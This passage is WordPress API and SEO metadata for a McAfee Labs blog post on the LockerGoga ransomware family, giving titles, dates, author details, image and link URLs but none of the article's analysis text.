Attacks\",\"datePublished\":\"2019-04-29T17:10:06+00:00\",\"dateModified\":\"2024-02-19T03:21:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\"},\"wordCount\":3944,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg\",\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\",\"name\":\"LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg\",\"datePublished\":\"2019-04-29T17:10:06+00:00\",\"dateModified\":\"2024-02-19T03:21:46+00:00\",\"description\":\"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg\",\"width\":1575,\"height\":1125},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"LockerGoga Ransomware Family Used in Targeted Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/668134594f276e8743322ec163337c6f\",\"name\":\"ATR Operational Intelligence Team\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/a7a29f6cfb004e05c7ac7a98652288d8\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/01\/McAfee-Advanced-Threat-Research-CTF-docx-1-96x96.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/01\/McAfee-Advanced-Threat-Research-CTF-docx-1-96x96.png\",\"caption\":\"ATR Operational Intelligence Team\"},\"description\":\"McAfee\u2019s Advanced Threat Research Operational Intelligence team operates globally around the clock, keeping watch of the latest cyber campaigns and actively tracking the most impactful cyber threats.\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/atr-operational-intelligence-team\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog","description":"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog","og_description":"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2019-04-29T17:10:06+00:00","article_modified_time":"2024-02-19T03:21:46+00:00","og_image":[{"width":1575,"height":1125,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg","type":"image\/jpeg"}],"author":"ATR Operational Intelligence Team","twitter_card":"summary_large_image","twitter_creator":"@McAfee","twitter_site":"@McAfee","twitter_misc":{"Written by":"ATR Operational Intelligence Team","Est. reading time":"20 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/"},"author":{"name":"ATR Operational Intelligence Team","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/668134594f276e8743322ec163337c6f"},"headline":"LockerGoga Ransomware Family Used in Targeted Attacks","datePublished":"2019-04-29T17:10:06+00:00","dateModified":"2024-02-19T03:21:46+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/"},"wordCount":3944,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg","articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/","name":"LockerGoga Ransomware Family Used in Targeted Attacks | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg","datePublished":"2019-04-29T17:10:06+00:00","dateModified":"2024-02-19T03:21:46+00:00","description":"Co-authored by Marc RiveroLopez. Initial discovery Once again, we have seen a significant new ransomware family in the news. LockerGoga, which adds new","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#primaryimage","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2019\/04\/Global-Cyber-security-concept-copy.jpg","width":1575,"height":1125},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/lockergoga-ransomware-family-used-in-targeted-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"LockerGoga Ransomware Family Used in Targeted Attacks"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/668134594f276e8743322ec163337c6f","name":"ATR Operational Intelligence Team","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/a7a29f6cfb004e05c7ac7a98652288d8","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/01\/McAfee-Advanced-Threat-Research-CTF-docx-1-96x96.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2021\/01\/McAfee-Advanced-Threat-Research-CTF-docx-1-96x96.png","caption":"ATR Operational Intelligence Team"},"description":"McAfee\u2019s Advanced Threat Research Operational Intelligence team operates globally around the clock, keeping watch of the latest cyber campaigns and actively tracking the most impactful cyber threats.","url":"https:\/\/www.mcafee.com\/blogs\/author\/atr-operational-intelligence-team\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/95044","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/1170"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=95044"}],"version-history":[{"count":1,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/95044\/revisions"}],"predecessor-version":[{"id":182955,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/95044\/revisions\/182955"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media\/95077"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=95044"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=95044"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=95044"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=95044"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}